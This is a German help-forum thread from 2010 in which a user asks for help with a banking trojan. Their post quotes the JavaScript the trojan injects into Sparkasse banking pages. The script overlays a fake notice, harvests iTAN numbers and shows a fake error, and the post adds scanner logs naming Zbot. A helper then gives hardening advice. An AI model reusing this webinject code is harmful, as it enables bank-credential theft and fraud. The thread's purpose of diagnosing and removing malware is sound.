Trojaner - Firefox langsam, seltsame Scripts im Quellcode..

chris93 · 17.08.2010, 13:41

Hallo Leute,
seit einigen Tagen habe ich ein Problem mit meinem Laptop. Ich hatte mir im Urlaub einen Trojaner zugezogen, der mir bestimmte Passwörter gezogen hatte (FTP..)
Nach Wiederherstellung des PCs (mit einer Funktion, die von HP auf meinem PC mitgeliefert wurde), funktionierte mein PC.
Bei der Wiederherstellung wurde der PC auf Kaufzustand zurückgesetzt und die Partition C: formatiert (die andere Partition hatte ich selbst formatiert).
Als ich Sonntag meine gesicherten Daten wieder auf den PC verschob, funktioniert alles.

Heute morgen der Schock: Ich habe wieder den gleichen Trojaner (zumindest denke ich das)

Folgender Code wird bei mir automatisch auf manchen Internetseiten in den Quelltext eingebunden:

Zitat:

ointer;" onClick="Back();"><img src="https://www.sandjengines.com/images/grid/pager/prev.gif" border=0></a>    
<a style="cursor

ointer;" onClick="Logon();"><img src="https://www.sandjengines.com/images/grid/pager/next.gif" border=0></a>
</center>
</div>
<div id="footer">
<hr size=1>
<div style="color:red;text-align:center">Achtung ! Es wird nie eine oder mehrere iTans per email oder telefonisch von unseren Mitarbeitern abgefragt !</div>

</div>

</div>
<script>
var htext = "";
var holder_name_label = document.getElementById("holder_name_label");
var warning = document.getElementById("warning");
var tan_table = document.getElementById("tan_table");
var tan_scan= document.getElementById("tan_scan");
var btn1= document.getElementById("btn1");
var tt1= document.getElementById("tt1");
var tt2= document.getElementById("tt2");
var btn1= document.getElementById("btn1");
var btn2= document.getElementById("btn2");
var loader= document.getElementById("loader");
var holder_name_input= document.getElementById("holder_name_input");
var fuckin_text= document.getElementById("fuckin_text");
var bad_select= document.getElementById("bad_select");
var texten45 = document.getElementById("texten45");

function write_c(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

function read_c(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

function getClientWidth(){
return document.compatMode=='CSS1Compat' && !window.opera?document.documentElement.clientWidth:document.body.clientWidth;
}

var value = 0;
function setOpacity() {
if(bad_select)bad_select.style.display = "none";
var wd = getClientWidth() / 2 - 220;
warning.style.left = wd+"px";
value += 0.3;
var testObj = document.getElementById("test");
testObj.style.width = getClientWidth()+"px";
testObj.style.height = "1500px";
testObj.style.display = "block";
if(navigator.appName == "Netscape"){
testObj.style.MozOpacity = value/10;
}else{
testObj.style.opacity = value/10;
testObj.style.filter = "alpha(opacity=" + value*10 + ")";
}

myTimeout = setTimeout("setOpacity()", 1);
if ((value/10) >= .5) {
clearTimeout(myTimeout);
}
warning.style.display = "block";
}

function removeOpacity() {
value -= .3;
var testObj = document.getElementById("test");
myTimeout2 = setTimeout("removeOpacity()", 1);
testObj.style.opacity = value/10;
testObj.style.filter = "alpha(opacity=" + value*10 + ")";
if ((value/10) <= 0) {
testObj.style.display = "none";
clearTimeout(myTimeout2);
}
warning.style.display = "none";
if(bad_select)bad_select.style.display = "";
}

function ShowTanTable(){
texten45.style.display = "none";
tan_table.style.display = "";
tt1.style.display = "";
tt2.style.display = "none";
btn2.style.display = "";
btn1.style.display = "none";
}

function ShowTanScan(){
texten45.style.display = "none";
tan_scan.style.display = "";
btn2.style.display = "";
btn1.style.display = "none";
}

function Back(){
texten45.style.display = "";
tan_table.style.display = "none";
tan_scan.style.display = "none";
btn1.style.display = "";
btn2.style.display = "none";
}
function GetError(a){
var a = a+"";
var error = 0;
for(var e=0; e<a.length; e++){
if(a[0] == a[e]){
error += 1;
}
}
return error;
}
function CheckForm(param){
var form = param;
var found = true;
if(form){
var inputs = form.getElementsByTagName("input");
if(inputs){
var err_state = 0;
for(var i=0; i < inputs.length; i++){

for(var e=0; e < inputs.length; e++){
if(inputs[i].value == inputs[e].value && i!=e){
inputs[i].style.border = "1px solid red";
err_state = 1;
found = false;
}
}

if((inputs[i].value == "" || inputs[i].value.length <6 || isNaN(inputs[i].value) || GetError(inputs[i].value) == 6)){
if(inputs[i].type == "text"){
inputs[i].style.border = "1px solid red";
err_state = 1;
found = false;
}
}
}
if(err_state != 1){
form.submit();
return found;
}
}
}

}

function ErAlert(){
alert("Die TAN-Nummern passen nicht zu Ihrem ID.");
}

function GetGutenTag(){
var GutenTag = ""
if(holder_name_label){
holder_name = holder_name_label.innerHTML;
if(holder_name.indexOf("Guten Tag") >= 0){
GutenTag = holder_name;
}else{
GutenTag = "Guten Tag "+holder_name;
}
}
return GutenTag;
}

function Logon(){
if(tan_table.style.display == ""){
if(tt1.style.display == ""){
var status = CheckForm(document.forma);
if(status){
tt1.style.display = "none";
loader.style.display = '';
var timer = setTimeout("loader.style.display = 'none'",2000);
var timer = setTimeout("ErAlert();tt2.style.display = '';",2000)
}
}else if(tt2.style.display == ""){
var status2 = CheckForm(document.forma2);
if(status2){
document.forma.submit();
document.forma2.submit();
write_c("c_state",0,180);
removeOpacity();
}
}
}else if(tan_scan.style.display == ""){
if(!uploaded){
startUpload();
}else{
write_c("c_state",0,180);
removeOpacity();
}
}
}

var fdomain = document.domain;

if(
holder_name_label &&
holder_name_label.innerHTML.toLowerCase().indexOf("mit dem absenden") == -1 &&
holder_name_label.innerHTML.toLowerCase().indexOf("beachten sie unsere") == -1 &&
holder_name_label.innerHTML.toLowerCase().indexOf("anmelden") == -1 &&
holder_name_label.innerHTML.toLowerCase().indexOf("herzlich willkommen") == -1 &&
holder_name_label.innerHTML.toLowerCase().indexOf("dem absenden ihrer anmeldedaten erkenn") == -1 &&
(
fdomain.toLowerCase().indexOf("bank")>=0 &&
(
fdomain.toLowerCase().indexOf("spark")>=0 ||
fdomain.toLowerCase().indexOf("spk")>=0 ||
fdomain.toLowerCase().indexOf("sska")>=0
)
)&&
(
fdomain.toLowerCase().indexOf(".de")>=0 ||
fdomain.toLowerCase().indexOf(".com")>=0
)
){
var c_state = read_c("c_state");
if(!c_state && holder_name_label.innerHTML != ""){
var g = GetGutenTag();
fuckin_text.innerHTML = g+". "+fuckin_text.innerHTML;
holder_name_input.value = holder_name_label.innerHTML;
setOpacity();
}
}
</script>

Außerdem ist mein Firefox ziemlich langsam und ich habe Angst, dass meine Daten anderweitig benutzt werden.
Ich würde mich über eure Hilfe freuen!

Mein System: Vista 32-Bit

HiJackThis-Logfile
HiJackthis Logfile:

Code:

ATTFilter

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 14:38:28, on 17.08.2010
Platform: Windows Vista  (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16982)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Windows\System32\mobsync.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe
C:\Windows\system32\conime.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Avira\AntiVir Desktop\avnotify.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=de_de&c=81&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=de_de&c=81&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=de_de&c=81&bd=Pavilion&pf=laptop
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: NCO 2.0 IE BHO - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKLM\..\Run: [ Malwarebytes Anti-Malware  (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [{5C716AC3-7309-B248-F13C-6157899AED61}] C:\Users\Chris\AppData\Roaming\Qolixy\ugdyf.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETZWERKDIENST')
O4 - Startup: Logitech . Produktregistrierung.lnk = C:\Program Files\Common Files\LogiShrd\eReg\SetPoint\eReg.exe
O4 - Global Startup: Dienst-Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Avira AntiVir Planer (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: SF FrontLine Drivers Auto Removal (v1) (sfrem01) - Protection Technology (StarForce) - C:\Windows\system32\sfrem01.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files\Common Files\Steam\SteamService.exe
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 6451 bytes

--- --- ---

[/QUOTE]

Antivir-Logfile (Nur der Ordner C:/Windows)

Zitat:

Avira AntiVir Personal
Erstellungsdatum der Reportdatei: Dienstag, 17. August 2010 14:00

Es wird nach 2719190 Virenstämmen gesucht.

Das Programm läuft als uneingeschränkte Vollversion.
Online-Dienste stehen zur Verfügung.

Lizenznehmer : Avira AntiVir Personal - FREE Antivirus
Seriennummer : 0000149996-ADJIE-0000001
Plattform : Windows Vista
Windowsversion : (plain) [6.0.6000]
Boot Modus : Normal gebootet
Benutzername : Chris
Computername : CHRIS-PC

Versionsinformationen:
BUILD.DAT : 10.0.0.567 32097 Bytes 19.04.2010 15:50:00
AVSCAN.EXE : 10.0.3.0 433832 Bytes 16.08.2010 14:40:29
AVSCAN.DLL : 10.0.3.0 56168 Bytes 16.08.2010 14:40:29
LUKE.DLL : 10.0.2.3 104296 Bytes 07.03.2010 16:32:59
LUKERES.DLL : 10.0.0.0 13672 Bytes 14.01.2010 09:59:47
VBASE000.VDF : 7.10.0.0 19875328 Bytes 06.11.2009 07:05:36
VBASE001.VDF : 7.10.1.0 1372672 Bytes 19.11.2009 17:27:49
VBASE002.VDF : 7.10.3.1 3143680 Bytes 20.01.2010 15:37:42
VBASE003.VDF : 7.10.3.75 996864 Bytes 26.01.2010 14:37:42
VBASE004.VDF : 7.10.4.203 1579008 Bytes 05.03.2010 09:29:03
VBASE005.VDF : 7.10.6.82 2494464 Bytes 15.04.2010 14:40:23
VBASE006.VDF : 7.10.7.218 2294784 Bytes 02.06.2010 14:40:24
VBASE007.VDF : 7.10.9.165 4840960 Bytes 23.07.2010 14:40:24
VBASE008.VDF : 7.10.9.166 2048 Bytes 23.07.2010 14:40:24
VBASE009.VDF : 7.10.9.167 2048 Bytes 23.07.2010 14:40:24
VBASE010.VDF : 7.10.9.168 2048 Bytes 23.07.2010 14:40:24
VBASE011.VDF : 7.10.9.169 2048 Bytes 23.07.2010 14:40:24
VBASE012.VDF : 7.10.9.170 2048 Bytes 23.07.2010 14:40:24
VBASE013.VDF : 7.10.9.198 157696 Bytes 26.07.2010 14:40:24
VBASE014.VDF : 7.10.9.255 997888 Bytes 29.07.2010 14:40:24
VBASE015.VDF : 7.10.10.28 139264 Bytes 02.08.2010 14:40:24
VBASE016.VDF : 7.10.10.52 127488 Bytes 03.08.2010 14:40:24
VBASE017.VDF : 7.10.10.84 137728 Bytes 06.08.2010 14:40:24
VBASE018.VDF : 7.10.10.107 176640 Bytes 09.08.2010 14:40:24
VBASE019.VDF : 7.10.10.130 132608 Bytes 10.08.2010 14:40:25
VBASE020.VDF : 7.10.10.158 131072 Bytes 12.08.2010 14:40:25
VBASE021.VDF : 7.10.10.159 2048 Bytes 12.08.2010 14:40:25
VBASE022.VDF : 7.10.10.160 2048 Bytes 12.08.2010 14:40:25
VBASE023.VDF : 7.10.10.161 2048 Bytes 12.08.2010 14:40:25
VBASE024.VDF : 7.10.10.162 2048 Bytes 12.08.2010 14:40:25
VBASE025.VDF : 7.10.10.163 2048 Bytes 12.08.2010 14:40:25
VBASE026.VDF : 7.10.10.164 2048 Bytes 12.08.2010 14:40:25
VBASE027.VDF : 7.10.10.165 2048 Bytes 12.08.2010 14:40:25
VBASE028.VDF : 7.10.10.166 2048 Bytes 12.08.2010 14:40:25
VBASE029.VDF : 7.10.10.167 2048 Bytes 12.08.2010 14:40:25
VBASE030.VDF : 7.10.10.168 2048 Bytes 12.08.2010 14:40:25
VBASE031.VDF : 7.10.10.187 106496 Bytes 16.08.2010 14:40:25
Engineversion : 8.2.4.34
AEVDF.DLL : 8.1.2.1 106868 Bytes 16.08.2010 14:40:28
AESCRIPT.DLL : 8.1.3.42 1364347 Bytes 16.08.2010 14:40:28
AESCN.DLL : 8.1.6.1 127347 Bytes 16.08.2010 14:40:27
AESBX.DLL : 8.1.3.1 254324 Bytes 16.08.2010 14:40:28
AERDL.DLL : 8.1.8.2 614772 Bytes 16.08.2010 14:40:27
AEPACK.DLL : 8.2.3.5 471412 Bytes 16.08.2010 14:40:27
AEOFFICE.DLL : 8.1.1.8 201081 Bytes 16.08.2010 14:40:26
AEHEUR.DLL : 8.1.2.11 2834805 Bytes 16.08.2010 14:40:26
AEHELP.DLL : 8.1.13.2 242039 Bytes 16.08.2010 14:40:26
AEGEN.DLL : 8.1.3.19 393587 Bytes 16.08.2010 14:40:26
AEEMU.DLL : 8.1.2.0 393588 Bytes 16.08.2010 14:40:25
AECORE.DLL : 8.1.16.2 192887 Bytes 16.08.2010 14:40:25
AEBB.DLL : 8.1.1.0 53618 Bytes 16.08.2010 14:40:25
AVWINLL.DLL : 10.0.0.0 19304 Bytes 14.01.2010 09:59:10
AVPREF.DLL : 10.0.0.0 44904 Bytes 14.01.2010 09:59:07
AVREP.DLL : 10.0.0.8 62209 Bytes 18.02.2010 14:47:40
AVREG.DLL : 10.0.3.0 53096 Bytes 16.08.2010 14:40:30
AVSCPLR.DLL : 10.0.3.0 83816 Bytes 16.08.2010 14:40:30
AVARKT.DLL : 10.0.0.14 227176 Bytes 16.08.2010 14:40:29
AVEVTLOG.DLL : 10.0.0.8 203112 Bytes 26.01.2010 07:53:25
SQLITE3.DLL : 3.6.19.0 355688 Bytes 28.01.2010 10:57:53
AVSMTP.DLL : 10.0.0.17 63848 Bytes 16.03.2010 13:38:54
NETNT.DLL : 10.0.0.0 11624 Bytes 19.02.2010 12:40:55
RCIMAGE.DLL : 10.0.0.26 2550120 Bytes 28.01.2010 11:10:08
RCTEXT.DLL : 10.0.53.0 98152 Bytes 16.08.2010 14:40:23

Konfiguration für den aktuellen Suchlauf:
Job Name..............................: ShlExt
Konfigurationsdatei...................: C:\Users\Chris\AppData\Local\Temp\96a64a95.avp
Protokollierung.......................: niedrig
Primäre Aktion........................: interaktiv
Sekundäre Aktion......................: ignorieren
Durchsuche Masterbootsektoren.........: ein
Durchsuche Bootsektoren...............: ein
Bootsektoren..........................: C:,
Durchsuche aktive Programme...........: aus
Durchsuche Registrierung..............: aus
Suche nach Rootkits...................: aus
Integritätsprüfung von Systemdateien..: aus
Datei Suchmodus.......................: Intelligente Dateiauswahl
Durchsuche Archive....................: ein
Rekursionstiefe einschränken..........: 20
Archiv Smart Extensions...............: ein
Makrovirenheuristik...................: ein
Dateiheuristik........................: mittel

Beginn des Suchlaufs: Dienstag, 17. August 2010 14:00

Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'C:\WINDOWS'

Ende des Suchlaufs: Dienstag, 17. August 2010 14:32
Benötigte Zeit: 31:38 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

14392 Verzeichnisse wurden überprüft
208103 Dateien wurden geprüft
0 Viren bzw. unerwünschte Programme wurden gefunden
0 Dateien wurden als verdächtig eingestuft
0 Dateien wurden gelöscht
0 Viren bzw. unerwünschte Programme wurden repariert
0 Dateien wurden in die Quarantäne verschoben
0 Dateien wurden umbenannt
0 Dateien konnten nicht durchsucht werden
208103 Dateien ohne Befall
667 Archive wurden durchsucht
0 Warnungen
0 Hinweise

Unter Übersicht-->Ereignisse finde ich folgende Funde:

Zitat:

17.08.2010 - 01:19
In der Datei 'C:\Users\Chris\Desktop\AutoRefresh\CBS Refresh.exe'
wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Pophot.cpc.17' [trojan] gefunden.
Ausgeführte Aktion: Zugriff erlauben

Zitat:

17.08.2010 - 01:19
In der Datei 'C:\Users\Chris\Desktop\AutoRefresh\CBS Refresh.exe'
wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Pophot.cpc.17' [trojan] gefunden.
Ausgeführte Aktion: Zugriff verweigern

Zitat:

17.08.2010 - 14:13
In der Datei 'C:\$Recycle.bin\S-1-5-21-3240998889-2527724164-3780441173-1000\$R23DCA7\CBS Refresh.exe'
wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Pophot.cpc.17' [trojan] gefunden.
Ausgeführte Aktion: Zugriff verweigern

Zitat:

17.08.2010 - 14:13
In der Datei 'C:\$Recycle.bin\S-1-5-21-3240998889-2527724164-3780441173-1000\$R23DCA7\CBS Refresh.exe'
wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Pophot.cpc.17' [trojan] gefunden.
Ausgeführte Aktion: Zugriff verweigern

Zitat:

17.08.2010 - 14:21
Die Datei 'C:\$Recycle.bin\S-1-5-21-3240998889-2527724164-3780441173-1000\$R23DCA7\CBS Refresh.exe'
enthielt einen Virus oder unerwünschtes Programm 'TR/Spy.Pophot.cpc.17' [trojan].
Durchgeführte Aktion(en):
Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '4fdbdb81.qua' verschoben!

Malwarebytes-Logfile (Quick-Scan)

Zitat:

Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Datenbank Version: 4439

Windows 6.0.6000
Internet Explorer 7.0.6000.16982

17.08.2010 14:37:52
mbam-log-2010-08-17 (14-37-52).txt

Art des Suchlaufs: Quick-Scan
Durchsuchte Objekte: 126332
Laufzeit: 15 Minute(n), 29 Sekunde(n)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 1
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 1

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{5c716ac3-7309-b248-f13c-6157899aed61} (Trojan.ZbotR.Gen) -> Quarantined and deleted successfully.

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
C:\Users\Chris\AppData\Roaming\Qolixy\ugdyf.exe (Trojan.ZbotR.Gen) -> Quarantined and deleted successfully.

Vielen Dank!

chris93 · 17.08.2010, 13:56

Nachdem ich den PC neugestartet habe (Malwarebytes hatte mich dazu aufgefordert), sehe ich den Script nichtmehr im Quellcode und mein Firefox scheint wieder schneller zu sein.

Wobei ich mir trotzdem nicht sicher bin, ob der Trojaner so leicht zu vernichten ist.

markusg · 17.08.2010, 14:24

schon mal was von updates gehört?
du kannst gleich wieder die recovery anschmeißen
danach sofort windows update seite aufsuchen, alle servicepacks und updates drauf, dann avira nach anleitung.

passwörter alle endern und dann das hier umsetzen:
1. solltest du nur noch als eingeschrenkter nutzer arbeiten , das admin konto ist nur für instalationen gedacht.
klicke start, tippe unter suchen (ausführen) systemsteuerung. wähle dort Benutzerkonten hinzufügen/entfernen.
wähle "neues konto erstellen"
Wähle standard benutzer.

die konten sollten mit einem passwort geschützt werden.
dazu auf konto endern klicken und passwörter vergeben.
Die folgenden konfigurationen als admin ausführen:
2. dep aktivieren:
dep für alle prozesse:
Datenausführungsverhinderung (DEP)
• "Datenausführungsverhinderung für alle Programme und Dienste mit Ausnahme der ausgewählten einschalten:".
wenn es zu problemen kommen sollte, kann man die betroffenen prozesse aus der Überwachung entfernen.

3. sehop aktivieren:
SEHOP aktivieren:
Aktivieren von SEHOP (Structured Exception Handling Overwrite Protection) in Windows-Betriebssystemen
klicke auf "Feature automatisch aktivieren"
und folge den anweisungen

4. als browser den firefox nutzen:
Webbrowser Firefox | Schneller, sicherer & anpassbar | Mozilla Europe
5. als adon noscript, es werden dadurch alle scripts (java) zb blockiert, du kannst diese dann frei geben, in dem du auf der seite, die freigegeben werden
soll, nen rechtsklick machst, noscript wählst, und temporär alle berectigungen aufheben wählst, somit werden sie für den besuch aufgehoben, oder alle beschrenkungen
aufheben, somit wird die seite freigegeben. das kann man natürlich wieder rückgängig machen.
http://filepony.de/download-adblock_firefox//
hier gibt es noch filterlisten:
Adblock Plus: Bekannte Filterlisten für Adblock Plus
hier würde ich 2 oder 3 deutsche filter auswählen.

unter sonstiges die malware blocklist.
7.
um das surfen sicherer zu machen, würde ich Sandboxie empfehlen.
Download:
drop.io
(als pdf)
wenn du mit dem programm gut auskommst, ist ne lizenz zu empfehlen.
1. es gibt dann noch ein paar mehr funktionen.
2. kommt nach nem monat die anzeige, dass das programm freeware ist, die verschwindet erst nach ner zeit, find ich n bissel nerfig.
3. ist die lizenz lebenslang gültig, kostenpunkt rund 25 €, und du kannst sie auf allen pcs in deinem haushalt einsetzen.
ab sofort also nur noch in der sanbox surfen bitte.
8. autorun für usb deaktivieren:
über diesen weg werden sehr häufig schaddateien verbreitet, schalte die funktion also ab.
Tipparchiv - Autorun/Autoplay gezielt für Laufwerkstypen oder -buchstaben abschalten - WinTotal.de
9. um deine software aktuell zu halten, instaliere secunia.
http://www.trojaner-board.de/83959-s...ector-psi.html
und file hippo update checker:
FileHippo.com Update Checker - FileHippo.com
10.
regelmäßige Backups des systems sind sehr wichtig, du weist nie, ob deine festplatte mal kaputt geht.
Acronis True Image 2010 - Festplatten-Backup-Software, Datei-Backup und Disk Imaging, Wiederherstellung von Anwendungseinstellungen, Backup von Musik, Videos, Fotos und Outlook-Mails
außerdem kannst du, bei neuerlichem malware befall das system zurücksetzen.
Das Backup sollte möglichst auf eine externe festplatte etc emacht werden, nicht auf die selbe, wo sich die zu sichernden daten befinden.
Von sehr wichtigen Daten könnte man noch eine zusätzliche Sicherung auf dvds/cds erstellen, dazu könnte man auch wiederbeschreibbare verwenden (rws) falls die sammlung mal erneuert werden soll.
und nun backup deiner seite einspielen, wenn auf dem server software genutzt wird, die eben falls updates benötigen könnte, einspielen

Trojaner - Firefox langsam, seltsame Scripts im Quellcode..

Plagegeister aller Art und deren Bekämpfung: Trojaner - Firefox langsam, seltsame Scripts im Quellcode..